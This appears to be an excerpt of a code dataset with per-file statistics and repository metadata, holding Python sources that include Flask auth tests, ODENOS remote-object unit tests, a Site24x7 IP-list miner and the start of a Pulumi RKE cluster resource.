        # unpack the archive, then remove it, keeping only the extracted tree
        root_dir = unpack_run(file_path)
        remove(file_path)
        outputlock.acquire()
        stdout("[+] doxx: '" + root_dir + "' ...check!")
        outputlock.release()
    else:
        outputlock.acquire()
        stderr("[!] doxx: There was an error pulling the repository file. Error: Unable to locate local archive file.", exit=1)
        outputlock.release()
| 38.853035
| 135
| 0.593537
| 1,453
| 12,161
| 4.780454
| 0.094288
| 0.104809
| 0.024331
| 0.023323
| 0.869421
| 0.83055
| 0.763029
| 0.730204
| 0.730204
| 0.715088
| 0
| 0.003549
| 0.258531
| 12,161
| 312
| 136
| 38.977564
| 0.766774
| 0.2832
| 0
| 0.819277
| 0
| 0.012048
| 0.165158
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054217
| false
| 0
| 0.042169
| 0
| 0.096386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
04c8ea116a425456d39a39007eeb07e8a31e03fb
| 80
|
py
|
Python
|
20160213_1.py
|
JaeGyu/PythonEx_1
|
e67053db6ca7431c3dd66351c190c53229e3f141
|
[
"MIT"
] | null | null | null |
20160213_1.py
|
JaeGyu/PythonEx_1
|
e67053db6ca7431c3dd66351c190c53229e3f141
|
[
"MIT"
] | null | null | null |
20160213_1.py
|
JaeGyu/PythonEx_1
|
e67053db6ca7431c3dd66351c190c53229e3f141
|
[
"MIT"
] | null | null | null |
#-*- coding: utf-8 -*-
"""Tiny demo script exercising mod1's sum helpers."""
import mod1

# print-as-function syntax: with a single argument it behaves identically
# on Python 2 and is required on Python 3, unlike the bare print statement
print(mod1.sum(1, 2))
print(mod1.safe_sum(1, 2))
| 16
| 24
| 0.6625
| 16
| 80
| 3.25
| 0.625
| 0.346154
| 0.192308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 0.125
| 80
| 5
| 24
| 16
| 0.628571
| 0.2625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
8e0b5ca50f31b4ce5353ce85b331c3391e804040
| 5,489
|
py
|
Python
|
tests/endpoints/test_auth_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
tests/endpoints/test_auth_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
tests/endpoints/test_auth_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
def test_register_get(client, captured_templates):
    """
    GIVEN a Flask test client
    WHEN '/register' is requested (GET)
    THEN the response is 200 and the register template is rendered
    with the expected `page_title` in its context
    """
    response = client.get("/register")
    # HTTP success
    assert response.status_code == 200
    # exactly one template was rendered
    assert len(captured_templates) == 1
    template, context = captured_templates[0]
    # it is the registration page with the expected title
    assert template.name == "register.html"
    assert "page_title" in context
    assert context["page_title"] == "Register"
def test_valid_register_post(client, captured_templates, test_db):
    """
    GIVEN a Flask test client and the test db
    WHEN valid registration data is posted to '/register' (POST)
    THEN the user is registered, logged in, and redirected to the
    landing page, which greets the new user by name
    """
    form_data = dict(
        username="28kadsen",
        email_address="28kadsen@gmail.com",
        password1="123456",
        password2="123456",
    )
    response = client.post("/register", data=form_data, follow_redirects=True)
    # redirect landed on a successful page
    assert response.status_code == 200
    # exactly one template was rendered: the landing page
    assert len(captured_templates) == 1
    template, context = captured_templates[0]
    assert template.name == "landing_page.html"
    assert "page_title" in context
    assert context["page_title"] == "Help & Help"
    # the navbar greets the freshly logged-in user
    html_content = response.data.decode()
    assert '<a class="nav-link" href="#">Welcome, 28kadsen</a>' in html_content
def test_invalid_register_post(client, captured_templates, test_db):
    """
    GIVEN a Flask test client and the test db
    WHEN invalid registration data is posted to '/register' (POST)
    THEN registration is rejected (400) and the re-rendered form
    contains the validation error messages
    """
    form_data = dict(
        username="gottheit",
        email_address="28kadsengmail.com",
        password1="44444",
        password2="55555",
    )
    response = client.post("/register", data=form_data, follow_redirects=True)
    # validation failure is reported with a 400
    assert response.status_code == 400
    # the registration form was re-rendered
    assert len(captured_templates) == 1
    template, context = captured_templates[0]
    assert template.name == "register.html"
    assert "page_title" in context
    assert context["page_title"] == "Register"
    # both field errors appear in the response body
    html_content = response.data.decode()
    assert "Invalid email address." in html_content
    assert "Field must be equal to password1." in html_content
def test_login_get(client, captured_templates):
    """
    GIVEN a Flask test client
    WHEN '/login' is requested (GET)
    THEN the response is 200 and the login template is rendered
    with the expected `page_title` in its context
    """
    response = client.get("/login")
    # HTTP success
    assert response.status_code == 200
    # exactly one template was rendered
    assert len(captured_templates) == 1
    template, context = captured_templates[0]
    # it is the login page with the expected title
    assert template.name == "login.html"
    assert "page_title" in context
    assert context["page_title"] == "Login"
def test_login_post(client, captured_templates, fake_user):
    """
    GIVEN a Flask test client and the fake_user fixture
    WHEN the fake_user's credentials are posted to '/login'
    THEN the user is logged in and redirected to the landing page
    """
    credentials = dict(username=fake_user.username, password="123456")
    response = client.post("/login", data=credentials, follow_redirects=True)
    # redirect landed on a successful page
    assert response.status_code == 200
    # exactly one template was rendered: the landing page
    assert len(captured_templates) == 1
    template, context = captured_templates[0]
    assert template.name == "landing_page.html"
    assert "page_title" in context
    assert context["page_title"] == "Help & Help"
def test_logout(client, captured_templates):
    """
    GIVEN a Flask test client
    WHEN '/logout' is requested (GET)
    THEN the user is logged out and redirected to the login page,
    which renders with the expected `page_title`
    """
    response = client.get("/logout", follow_redirects=True)
    # redirect landed on a successful page
    assert response.status_code == 200
    # exactly one template was rendered: the login page
    assert len(captured_templates) == 1
    template, context = captured_templates[0]
    assert template.name == "login.html"
    assert "page_title" in context
    assert context["page_title"] == "Login"
| 29.831522
| 82
| 0.674075
| 722
| 5,489
| 5.020776
| 0.146814
| 0.084414
| 0.039724
| 0.036414
| 0.857655
| 0.825655
| 0.806345
| 0.806345
| 0.787034
| 0.761655
| 0
| 0.016973
| 0.23793
| 5,489
| 183
| 83
| 29.994536
| 0.849629
| 0.404263
| 0
| 0.653333
| 0
| 0
| 0.154493
| 0
| 0
| 0
| 0
| 0
| 0.44
| 1
| 0.08
| false
| 0.08
| 0
| 0
| 0.08
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
8e4dbb435e98d67b6bdc98e969abb443f9268267
| 17,717
|
py
|
Python
|
src/test/python/org/o3project/odenos/core/util/test_remote_object_interface.py
|
o3project/odenos
|
837d0d3d3c37482e843c40c5eeeac10646e68c65
|
[
"Apache-2.0"
] | 26
|
2015-02-18T10:22:50.000Z
|
2020-06-18T05:07:54.000Z
|
src/test/python/org/o3project/odenos/core/util/test_remote_object_interface.py
|
o3project/odenos
|
837d0d3d3c37482e843c40c5eeeac10646e68c65
|
[
"Apache-2.0"
] | 45
|
2015-02-20T00:40:45.000Z
|
2021-12-14T21:07:57.000Z
|
src/test/python/org/o3project/odenos/core/util/test_remote_object_interface.py
|
o3project/odenos
|
837d0d3d3c37482e843c40c5eeeac10646e68c65
|
[
"Apache-2.0"
] | 30
|
2015-02-19T02:00:35.000Z
|
2017-02-18T15:28:09.000Z
|
# -*- coding:utf-8 -*-
# Copyright 2015 NEC Corporation. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
from org.o3project.odenos.core.util.remote_object_interface import (
RemoteObjectInterface)
from org.o3project.odenos.remoteobject.message.request import Request
from org.o3project.odenos.remoteobject.message.response import Response
import unittest
from mock import Mock, patch
from contextlib import nested
class RemoteObjectInterfaceTest(unittest.TestCase):
def setUp(self):
    """Create a RemoteObjectInterface wired to a mocked dispatcher."""
    # NOTE: the misspelled attribute name `Disppatcher` is kept because
    # other tests reference it
    self.Disppatcher = Mock()
    self.object_id = "ObjectId"
    self.txid = "*"
    self.target = RemoteObjectInterface(self.Disppatcher, self.object_id)
def tearDown(self):
    """Drop the object under test between test cases."""
    self.target = None
def test_constructor(self):
    """Constructor stores the dispatcher and object id in private attributes."""
    # attribute names are name-mangled (class-private) on the instance
    self.assertEqual(self.target._RemoteObjectInterface__dispatcher, self.Disppatcher)
    self.assertEqual(self.target._RemoteObjectInterface__object_id, self.object_id)
def test_object_id(self):
    """The object_id property exposes the id given to the constructor."""
    self.assertEqual(self.target.object_id, self.object_id)
def test_get_property_success(self):
    """get_property() returns a result when the remote object answers OK."""
    value = "propertyBody"
    patch_target = ('org.o3project.odenos.core.util.remote_object_interface.'
                    'RemoteObjectInterface._get_object_to_remote_object')
    with patch(patch_target,
               return_value=Response(Response.StatusCode.OK, value)) as m_get_object:
        self.result = self.target.get_property()
        # exactly one remote GET against the property path
        self.assertEqual(m_get_object.call_count, 1)
        self.assertEqual(m_get_object.call_args[0][0],
                         RemoteObjectInterface.PROPETY_PATH)
        # an OK response is propagated to the caller
        self.assertNotEqual(self.result, None)
def test_get_property_StatusCode_NotOK(self):
    """get_property() returns None when the remote object answers non-OK."""
    value = "propertyBody"
    patch_target = ('org.o3project.odenos.core.util.remote_object_interface.'
                    'RemoteObjectInterface._get_object_to_remote_object')
    with patch(patch_target,
               return_value=Response(Response.StatusCode.NOT_FOUND, value)) as m_get_object:
        self.result = self.target.get_property()
        # exactly one remote GET against the property path
        self.assertEqual(m_get_object.call_count, 1)
        self.assertEqual(m_get_object.call_args[0][0],
                         RemoteObjectInterface.PROPETY_PATH)
        # a non-OK response maps to None
        self.assertEqual(self.result, None)
def test_get_settings_success(self):
    """get_settings() returns a result when the remote object answers OK."""
    value = "settingsBody"
    patch_target = ('org.o3project.odenos.core.util.remote_object_interface.'
                    'RemoteObjectInterface._get_object_to_remote_object')
    with patch(patch_target,
               return_value=Response(Response.StatusCode.OK, value)) as m_get_object:
        self.result = self.target.get_settings()
        # exactly one remote GET against the settings path
        self.assertEqual(m_get_object.call_count, 1)
        self.assertEqual(m_get_object.call_args[0][0],
                         RemoteObjectInterface.SETTINGS_PATH)
        # an OK response is propagated to the caller
        self.assertNotEqual(self.result, None)
def test_get_settings_StatusCode_NotOK(self):
    """get_settings() returns None when the remote object answers non-OK."""
    value = "settingsBody"
    patch_target = ('org.o3project.odenos.core.util.remote_object_interface.'
                    'RemoteObjectInterface._get_object_to_remote_object')
    with patch(patch_target,
               return_value=Response(Response.StatusCode.NOT_FOUND, value)) as m_get_object:
        self.result = self.target.get_settings()
        # exactly one remote GET against the settings path
        self.assertEqual(m_get_object.call_count, 1)
        self.assertEqual(m_get_object.call_args[0][0],
                         RemoteObjectInterface.SETTINGS_PATH)
        # a non-OK response maps to None
        self.assertEqual(self.result, None)
def test_put_property_success(self):
    """put_property() issues one PUT to the property path with the given body."""
    value = "propertyBody"
    patch_target = ('org.o3project.odenos.core.util.remote_object_interface.'
                    'RemoteObjectInterface._put_object_to_remote_object')
    with patch(patch_target) as m_put_object:
        self.result = self.target.put_property(value)
        # exactly one remote PUT with the property path and body
        self.assertEqual(m_put_object.call_count, 1)
        m_put_object.assert_any_call(RemoteObjectInterface.PROPETY_PATH, value)
        self.assertNotEqual(self.result, None)
def test_put_setting_success(self):
    """put_settings() issues one PUT to the settings path with the given body."""
    settings_path = RemoteObjectInterface.SETTINGS_PATH
    value = "settingsBody"
    patch_target = ('org.o3project.odenos.core.util.remote_object_interface.'
                    'RemoteObjectInterface._put_object_to_remote_object')
    with patch(patch_target) as m_put_object:
        self.result = self.target.put_settings(value)
        # exactly one remote PUT with the settings path and body
        self.assertEqual(m_put_object.call_count, 1)
        m_put_object.assert_any_call(settings_path, value)
        self.assertNotEqual(self.result, None)
def test__post_object_to_remote_object_success(self):
    """_post_object_to_remote_object() sends one POST and logs nothing on OK."""
    Path = RemoteObjectInterface.PROPETY_PATH
    method = Request.Method.POST
    value = "propertyBody"
    # contextlib.nested() was deprecated in Python 2.7 and removed in
    # Python 3; the multi-manager `with` statement is the equivalent form
    with patch('org.o3project.odenos.core.util.remote_object_interface.'
               'RemoteObjectInterface.'
               '_RemoteObjectInterface__send_request',
               return_value=Response(Response.StatusCode.OK, value)) as m_send_request, \
            patch('logging.debug') as m_log_debug:
        self.result = self.target._post_object_to_remote_object(Path, value)
        # exactly one request: POST <path> <body>
        self.assertEqual(m_send_request.call_count, 1)
        m_send_request.assert_any_call(method, Path, value)
        # no debug logging on a successful response
        self.assertEqual(m_log_debug.call_count, 0)
        self.assertNotEqual(self.result, None)
def test__post_object_to_remote_object_StatusCode_NotOK(self):
    """_post_object_to_remote_object() logs a debug message on a non-OK response."""
    Path = RemoteObjectInterface.PROPETY_PATH
    method = Request.Method.POST
    status_code = Response.StatusCode.NOT_FOUND
    # the exact debug line the implementation is expected to emit
    debug_log = ("Error Response POST DestID:" + self.object_id
                 + " Path:" + Path
                 + " StatusCode:" + str(status_code))
    value = "propertyBody"
    # contextlib.nested() was deprecated in Python 2.7 and removed in
    # Python 3; the multi-manager `with` statement is the equivalent form
    with patch('org.o3project.odenos.core.util.remote_object_interface.'
               'RemoteObjectInterface.'
               '_RemoteObjectInterface__send_request',
               return_value=Response(status_code, value)) as m_send_request, \
            patch('logging.debug') as m_log_debug:
        self.result = self.target._post_object_to_remote_object(Path, value)
        # exactly one request: POST <path> <body>
        self.assertEqual(m_send_request.call_count, 1)
        m_send_request.assert_any_call(method, Path, value)
        # one debug line describing the failure
        self.assertEqual(m_log_debug.call_count, 1)
        m_log_debug.assert_any_call(debug_log)
        self.assertNotEqual(self.result, None)
def test__put_object_to_remote_object_success(self):
    """_put_object_to_remote_object PUTs the body and logs nothing on OK."""
    Path = RemoteObjectInterface.PROPETY_PATH
    method = Request.Method.PUT
    value = "propertyBody"
    # contextlib.nested is deprecated (removed in Python 3); the
    # multi-item with statement is the supported equivalent.
    with patch('org.o3project.odenos.core.util.remote_object_interface.'
               'RemoteObjectInterface.'
               '_RemoteObjectInterface__send_request',
               return_value=Response(Response.StatusCode.OK, value)
               ) as m_send_request, \
            patch('logging.debug') as m_log_debug:
        self.result = self.target._put_object_to_remote_object(Path,
                                                               value)
        self.assertEqual(m_send_request.call_count, 1)
        m_send_request.assert_any_call(method, Path, value)
        # success path must not emit a debug log
        self.assertEqual(m_log_debug.call_count, 0)
        self.assertNotEqual(self.result, None)
def test__put_object_to_remote_object_StatusCode_NotOK(self):
    """_put_object_to_remote_object logs a debug message on a non-OK status."""
    Path = RemoteObjectInterface.PROPETY_PATH
    method = Request.Method.PUT
    _object_id = self.object_id
    status_code = Response.StatusCode.NOT_FOUND
    debug_log = "Error Response PUT DestID:" + _object_id\
        + " Path:" + Path\
        + " StatusCode:" + str(status_code)
    value = "propertyBody"
    # contextlib.nested is deprecated (removed in Python 3); the
    # multi-item with statement is the supported equivalent.
    with patch('org.o3project.odenos.core.util.remote_object_interface.'
               'RemoteObjectInterface.'
               '_RemoteObjectInterface__send_request',
               return_value=Response(status_code, value)
               ) as m_send_request, \
            patch('logging.debug') as m_log_debug:
        self.result = self.target._put_object_to_remote_object(Path,
                                                               value)
        self.assertEqual(m_send_request.call_count, 1)
        m_send_request.assert_any_call(method, Path, value)
        self.assertEqual(m_log_debug.call_count, 1)
        m_log_debug.assert_any_call(debug_log)
        self.assertNotEqual(self.result, None)
def test__del_object_to_remote_object_success(self):
    """_del_object_to_remote_object DELETEs with a body and logs nothing on OK."""
    Path = RemoteObjectInterface.PROPETY_PATH
    method = Request.Method.DELETE
    value = "propertyBody"
    # contextlib.nested is deprecated (removed in Python 3); the
    # multi-item with statement is the supported equivalent.
    with patch('org.o3project.odenos.core.util.remote_object_interface.'
               'RemoteObjectInterface.'
               '_RemoteObjectInterface__send_request',
               return_value=Response(Response.StatusCode.OK, value)
               ) as m_send_request, \
            patch('logging.debug') as m_log_debug:
        self.result = self.target._del_object_to_remote_object(Path,
                                                               value)
        self.assertEqual(m_send_request.call_count, 1)
        # DELETE passes its payload as the keyword argument `body`
        m_send_request.assert_any_call(method, Path, body=value)
        self.assertEqual(m_log_debug.call_count, 0)
        self.assertNotEqual(self.result, None)
def test__del_object_to_remote_object_success_Nobody(self):
    """_del_object_to_remote_object defaults to body=None when no body is given."""
    Path = RemoteObjectInterface.PROPETY_PATH
    method = Request.Method.DELETE
    # contextlib.nested is deprecated (removed in Python 3); the
    # multi-item with statement is the supported equivalent.
    with patch('org.o3project.odenos.core.util.remote_object_interface.'
               'RemoteObjectInterface.'
               '_RemoteObjectInterface__send_request',
               return_value=Response(Response.StatusCode.OK, None)
               ) as m_send_request, \
            patch('logging.debug') as m_log_debug:
        self.result = self.target._del_object_to_remote_object(Path)
        self.assertEqual(m_send_request.call_count, 1)
        m_send_request.assert_any_call(method, Path, body=None)
        self.assertEqual(m_log_debug.call_count, 0)
        self.assertNotEqual(self.result, None)
def test__del_object_to_remote_object_StatusCode_NotOK(self):
    """_del_object_to_remote_object logs a debug message on a non-OK status."""
    Path = RemoteObjectInterface.PROPETY_PATH
    method = Request.Method.DELETE
    _object_id = self.object_id
    status_code = Response.StatusCode.NOT_FOUND
    debug_log = "Error Response DELETE DestID:" + _object_id\
        + " Path:" + Path\
        + " StatusCode:" + str(status_code)
    value = "propertyBody"
    # contextlib.nested is deprecated (removed in Python 3); the
    # multi-item with statement is the supported equivalent.
    with patch('org.o3project.odenos.core.util.remote_object_interface.'
               'RemoteObjectInterface.'
               '_RemoteObjectInterface__send_request',
               return_value=Response(status_code, value)
               ) as m_send_request, \
            patch('logging.debug') as m_log_debug:
        self.result = self.target._del_object_to_remote_object(Path,
                                                               value)
        self.assertEqual(m_send_request.call_count, 1)
        m_send_request.assert_any_call(method, Path, body=value)
        self.assertEqual(m_log_debug.call_count, 1)
        m_log_debug.assert_any_call(debug_log)
        self.assertNotEqual(self.result, None)
def test__get_object_to_remote_object_success(self):
    """_get_object_to_remote_object GETs the path and logs nothing on OK."""
    Path = RemoteObjectInterface.PROPETY_PATH
    method = Request.Method.GET
    # contextlib.nested is deprecated (removed in Python 3); the
    # multi-item with statement is the supported equivalent.
    with patch('org.o3project.odenos.core.util.remote_object_interface.'
               'RemoteObjectInterface.'
               '_RemoteObjectInterface__send_request',
               return_value=Response(Response.StatusCode.OK, None)
               ) as m_send_request, \
            patch('logging.debug') as m_log_debug:
        self.result = self.target._get_object_to_remote_object(Path)
        self.assertEqual(m_send_request.call_count, 1)
        # GET sends no body
        m_send_request.assert_any_call(method, Path)
        self.assertEqual(m_log_debug.call_count, 0)
        self.assertNotEqual(self.result, None)
def test__get_object_to_remote_object_StatusCode_NotOK(self):
    """_get_object_to_remote_object logs a debug message on a non-OK status."""
    Path = RemoteObjectInterface.PROPETY_PATH
    method = Request.Method.GET
    _object_id = self.object_id
    status_code = Response.StatusCode.NOT_FOUND
    debug_log = "Error Response GET DestID:" + _object_id\
        + " Path:" + Path\
        + " StatusCode:" + str(status_code)
    # contextlib.nested is deprecated (removed in Python 3); the
    # multi-item with statement is the supported equivalent.
    with patch('org.o3project.odenos.core.util.remote_object_interface.'
               'RemoteObjectInterface.'
               '_RemoteObjectInterface__send_request',
               return_value=Response(status_code, None)
               ) as m_send_request, \
            patch('logging.debug') as m_log_debug:
        self.result = self.target._get_object_to_remote_object(Path)
        self.assertEqual(m_send_request.call_count, 1)
        m_send_request.assert_any_call(method, Path)
        self.assertEqual(m_log_debug.call_count, 1)
        m_log_debug.assert_any_call(debug_log)
        self.assertNotEqual(self.result, None)
def test___send_request_success(self):
    """__send_request builds a Request, forwards it via request_sync, and
    returns the dispatcher's result without logging an error."""
    Path = RemoteObjectInterface.PROPETY_PATH
    method = Request.Method.GET
    _object_id = self.object_id
    _txid = self.txid
    value = "propertyBody"
    dmy_request_sync = self.Disppatcher.request_sync
    dmy_request_sync.return_value = "result_request_sync"
    with patch('logging.error') as m_log_error:
        self.result = self.target._RemoteObjectInterface__send_request(
            method, Path, value)
        self.assertEqual(dmy_request_sync.call_count, 1)
        self.assertEqual(dmy_request_sync.call_args[0][0].
                         packed_object(),
                         (_object_id, method, Path, _txid, value))
        # BUG FIX: with a plain patch() the target mock is m_log_error
        # itself; the old `m_log_error[0]` addressed a child mock whose
        # call_count is always 0, making the assertion vacuous.
        self.assertEqual(m_log_error.call_count, 0)
        self.assertEqual(self.result, "result_request_sync")
def test___send_request_request_sync_error(self):
    """__send_request returns an INTERNAL_SERVER_ERROR Response and logs
    twice when the dispatcher's request_sync raises."""
    Path = RemoteObjectInterface.PROPETY_PATH
    method = Request.Method.GET
    _object_id = self.object_id
    _txid = self.txid
    value = "propertyBody"
    dmy_request_sync = self.Disppatcher.request_sync
    # side_effect wins over return_value: every call raises KeyError(1)
    dmy_request_sync.side_effect = KeyError(1)
    dmy_request_sync.return_value = "result_request_sync"
    debug_log = "Exception: Request to " + _object_id \
        + " Method:" + method\
        + " Path:" + Path
    # Single context manager: contextlib.nested (deprecated) added nothing
    # but a one-element tuple; use patch() directly and drop the indexing.
    with patch('logging.error') as m_log_error:
        self.result = self.target._RemoteObjectInterface__send_request(
            method, Path, value)
        self.assertEqual(dmy_request_sync.call_count, 1)
        self.assertEqual(dmy_request_sync.call_args[0][0].
                         packed_object(),
                         (_object_id, method, Path, _txid, value))
        self.assertEqual(m_log_error.call_count, 2)
        m_log_error.assert_any_call(debug_log)
        self.assertNotEqual(self.result, "result_request_sync")
        self.assertEqual(self.result.packed_object(),
                         (Response.StatusCode.INTERNAL_SERVER_ERROR,
                          None))
# Run the whole test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 46.138021
| 79
| 0.588531
| 1,806
| 17,717
| 5.421927
| 0.084718
| 0.062806
| 0.04902
| 0.04902
| 0.870915
| 0.853656
| 0.844975
| 0.83752
| 0.81873
| 0.795547
| 0
| 0.006016
| 0.333917
| 17,717
| 383
| 80
| 46.258486
| 0.823744
| 0.053
| 0
| 0.781046
| 0
| 0
| 0.135692
| 0.098581
| 0
| 0
| 0
| 0
| 0.232026
| 1
| 0.068627
| false
| 0
| 0.019608
| 0
| 0.091503
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e52e8200994b43cdcaf1b7b0da63e22c59279f4
| 2,969
|
py
|
Python
|
site24x7miner/node.py
|
bilalbox/site24x7-miner
|
79e90a2ba6a4e4eb675437489ee5d5825810abc6
|
[
"Apache-2.0"
] | null | null | null |
site24x7miner/node.py
|
bilalbox/site24x7-miner
|
79e90a2ba6a4e4eb675437489ee5d5825810abc6
|
[
"Apache-2.0"
] | null | null | null |
site24x7miner/node.py
|
bilalbox/site24x7-miner
|
79e90a2ba6a4e4eb675437489ee5d5825810abc6
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
import logging
import requests
import json
from minemeld.ft.basepoller import BasePollerFT
LOG = logging.getLogger(__name__)
class IPv4(BasePollerFT):
    """Miner that polls Site24x7 location data and emits IPv4 indicators."""

    def configure(self):
        super(IPv4, self).configure()

        # request timeout (seconds) and TLS certificate verification,
        # both overridable from the node config
        self.polling_timeout = self.config.get('polling_timeout', 20)
        self.verify_cert = self.config.get('verify_cert', False)
        self.url = 'https://creatorexport.zoho.com/site24x7/location-manager/json/IP_Address_View/C80EnP71mW2fDd60GaDgnPbVwMS8AGmP85vrN27EZ1CnCjPwnm0zPB5EX4Ct4q9n3rUnUgYwgwX0BW3KFtxnBqHt60Sz1Pgntgru/'

    def _process_item(self, item):
        # called on each item returned by _build_iterator
        # it should return a list of (indicator, value) pairs
        if item is None:
            LOG.error('%s - no IP information found', self.name)
            return []
        value = {
            'type': 'IPv4',
            'confidence': 100
        }
        return [[item, value]]

    def _build_iterator(self, now):
        # called at every polling interval
        # here you should retrieve and return the list of items
        # BUG FIX: polling_timeout and verify_cert were configured in
        # configure() but never passed to requests.get(), so the request
        # could hang forever and always verified certificates.
        r = requests.get(self.url,
                         timeout=self.polling_timeout,
                         verify=self.verify_cert)
        try:
            r.raise_for_status()
        except Exception:
            # log the failing status/body for diagnosis, then re-raise
            # (narrowed from a bare except, which also caught
            # KeyboardInterrupt/SystemExit)
            LOG.debug('%s - exception in request: %s %s',
                      self.name, r.status_code, r.content)
            raise

        # each location lists whitespace-separated IPs, possibly with
        # trailing commas; flatten and strip them lazily
        j = json.loads(r.text)['LocationDetails']
        return iter(l.rstrip(',') for loc in j for l in loc['external_ip'].split())
class IPv6(BasePollerFT):
    """Miner that polls Site24x7 location data and emits IPv6 indicators."""

    def configure(self):
        super(IPv6, self).configure()

        # request timeout (seconds) and TLS certificate verification,
        # both overridable from the node config
        self.polling_timeout = self.config.get('polling_timeout', 20)
        self.verify_cert = self.config.get('verify_cert', False)
        self.url = 'https://creatorexport.zoho.com/site24x7/location-manager/json/IP_Address_View/C80EnP71mW2fDd60GaDgnPbVwMS8AGmP85vrN27EZ1CnCjPwnm0zPB5EX4Ct4q9n3rUnUgYwgwX0BW3KFtxnBqHt60Sz1Pgntgru/'

    def _process_item(self, item):
        # called on each item returned by _build_iterator
        # it should return a list of (indicator, value) pairs
        if item is None:
            LOG.error('%s - no IP information found', self.name)
            return []
        value = {
            'type': 'IPv6',
            'confidence': 100
        }
        return [[item, value]]

    def _build_iterator(self, now):
        # called at every polling interval
        # here you should retrieve and return the list of items
        # BUG FIX: polling_timeout and verify_cert were configured in
        # configure() but never passed to requests.get(), so the request
        # could hang forever and always verified certificates.
        r = requests.get(self.url,
                         timeout=self.polling_timeout,
                         verify=self.verify_cert)
        try:
            r.raise_for_status()
        except Exception:
            # log the failing status/body for diagnosis, then re-raise
            # (narrowed from a bare except, which also caught
            # KeyboardInterrupt/SystemExit)
            LOG.debug('%s - exception in request: %s %s',
                      self.name, r.status_code, r.content)
            raise

        # each location lists whitespace-separated IPs, possibly with
        # trailing commas; flatten and strip them lazily
        j = json.loads(r.text)['LocationDetails']
        return iter(l.rstrip(',') for loc in j for l in loc['IPv6_Address_External'].split())
| 33.738636
| 200
| 0.616706
| 344
| 2,969
| 5.200581
| 0.30814
| 0.029067
| 0.029067
| 0.031302
| 0.885411
| 0.848519
| 0.848519
| 0.848519
| 0.848519
| 0.848519
| 0
| 0.033475
| 0.285618
| 2,969
| 87
| 201
| 34.126437
| 0.809995
| 0.14584
| 0
| 0.724138
| 0
| 0
| 0.249505
| 0.008317
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.086207
| 0
| 0.327586
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d093798ef39de535f6b2ef5d31bcaffe80bf0fe
| 165,391
|
py
|
Python
|
sdk/python/pulumi_rke/cluster.py
|
mitchellmaler/pulumi-rke
|
af2e3416c802f7b3eea7102788c9aed3cfd65f20
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_rke/cluster.py
|
mitchellmaler/pulumi-rke
|
af2e3416c802f7b3eea7102788c9aed3cfd65f20
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_rke/cluster.py
|
mitchellmaler/pulumi-rke
|
af2e3416c802f7b3eea7102788c9aed3cfd65f20
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from . import utilities, tables
class Cluster(pulumi.CustomResource):
addon_job_timeout: pulumi.Output[float]
"""
RKE k8s cluster addon deployment timeout in seconds for status check (int)
"""
addons: pulumi.Output[str]
"""
RKE k8s cluster user addons YAML manifest to be deployed (string)
"""
addons_includes: pulumi.Output[list]
"""
RKE k8s cluster user addons YAML manifest urls or paths to be deployed (list)
"""
api_server_url: pulumi.Output[str]
"""
(Computed) RKE k8s cluster api server url (string)
"""
authentication: pulumi.Output[dict]
"""
RKE k8s cluster authentication configuration (list maxitems:1)
* `sans` (`list`) - List of additional hostnames and IPs to include in the api server PKI cert (list)
